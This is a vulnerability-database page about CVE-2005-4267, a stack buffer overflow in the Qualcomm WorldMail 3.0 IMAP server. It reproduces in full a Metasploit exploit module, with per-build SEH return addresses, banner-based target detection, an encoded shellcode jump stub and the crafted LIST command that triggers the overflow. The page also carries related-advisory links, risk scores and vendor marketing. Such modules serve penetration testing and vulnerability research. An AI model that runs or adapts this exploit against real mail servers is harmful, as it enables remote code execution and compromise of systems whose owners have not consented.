Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow

🗓️ 25 Oct 2006 22:03:40Reported by MC <[email protected]>, jduck <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 22 Views

Exploit for Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus		WorldMail IMAP Server Directory Traversal Arbitrary Spool Access
17 Nov 200500:00
nessus
Tenable Nessus		Qualcomm WorldMail Multiple IMAP Command Remote Overflow
20 Dec 200500:00
nessus
Circl		CVE-2005-4267
1 Jul 201000:00
circl
Check Point Advisories		Qualcomm WorldMail IMAP Literal Token Parsing Buffer Overflow (CVE-2005-4267)
5 Nov 200900:00
checkpoint_advisories
Check Point Advisories		IMAP Servers LIST Command Buffer Overflow (CVE-2005-4267)
10 Aug 200600:00
checkpoint_advisories
CVE		CVE-2005-4267
21 Dec 200511:00
cve
Cvelist		CVE-2005-4267
21 Dec 200511:00
cvelist
Exploit DB		Eudora Qualcomm WorldMail 3.0 - IMAPd &#039;LIST&#039; Remote Buffer Overflow (Metasploit)
1 Jul 201000:00
exploitdb
NVD		CVE-2005-4267
21 Dec 200511:03
nvd
OpenVAS		Eudora WorldMail IMAP Server Buffer Overflow Vulnerability
18 Jan 201200:00
openvas
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Imap
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server
        version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this
        particular vulnerability.

        NOTE: The service does NOT restart automatically by default. You may be limited to
        only one attempt, so choose wisely!
      },
      'Author'         => [ 'MC', 'jduck' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2005-4267'],
          [ 'OSVDB', '22097'],
          [ 'BID', '15980'],

        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 750,
          'BadChars' => "\x00\x0a\x0d\x20\x7b",
          'StackAdustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { } ],
          [ 'WorldMail 3 Version 6.1.19.0',   { 'Ret' => 0x600b6317 } ], # p/p/r in MLstMgr.dll v6.1.19.0
          [ 'WorldMail 3 Version 6.1.20.0',   { 'Ret' => 0x10022187 } ], # p/p/r in msremote.dll ?
          [ 'WorldMail 3 Version 6.1.22.0',   { 'Ret' => 0x10022187 } ], # p/p/r in MsRemote.dll v6.1.22.0
        ],
      'DisclosureDate' => '2005-12-20',
      'DefaultTarget' => 0))
  end

  def check
    targ = auto_target
    disconnect

    return Exploit::CheckCode::Appears if (targ)
    return Exploit::CheckCode::Safe
  end

  def auto_target
    connect

    if (banner and banner =~ /WorldMail/ and banner =~ /IMAP4 Server (.*) ready/)
      version = $1
      ver = version.split('.')
      if (ver.length == 4)
        major = ver[0].to_i
        minor = ver[1].to_i
        rev = ver[2].to_i
        build = ver[3].to_i
        if (major == 6 and minor == 1)
          return targets[1] if (rev == 19)
          return targets[2] if (rev == 20)
          return targets[3] if (rev == 22)
        end
      end
    end

    # no target found
    nil
  end

  def exploit
    if (target_index == 0)
      mytarget = auto_target
      if mytarget
        print_status("Automatically detected \"#{mytarget.name}\" ...")
      else
        fail_with(Failure::NoTarget, 'Unable to automatically detect a target')
      end
    else
      mytarget = target
      connect
    end

    jmp =  "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28"
    jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"
    jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"

    sploit =  "a001 LIST " + rand_text_alphanumeric(20)
    sploit << payload.encoded
    sploit << generate_seh_record(mytarget.ret)
    sploit << make_nops(8) + jmp + rand_text_alphanumeric(40)
    sploit << "}" + "\r\n"

    sock.put(sploit)

    handler
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Oct 2020 20:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
EPSS0.66803
qualcommworldmailimapdbuffer overflowmetasploitstackvulnerabilitycveosvdbbidwindows
22